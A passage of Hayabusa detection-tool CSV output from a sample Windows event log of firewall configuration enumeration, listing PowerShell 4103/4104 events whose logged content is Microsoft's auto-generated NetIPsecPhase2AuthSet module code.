$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecPhase2AuthSet'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.973 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.973 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.973 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.973 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.973 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecPhase2AuthSet""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.973 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecPhase2AuthSet""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.973 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecPhase2AuthSet""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.973 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecPhase2AuthSet""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.973 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecPhase2AuthSet""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.973 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecPhase2AuthSet""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.973 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.973 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function New-NetIPsecPhase2AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.973 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.973 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetIPsecPhase2AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] 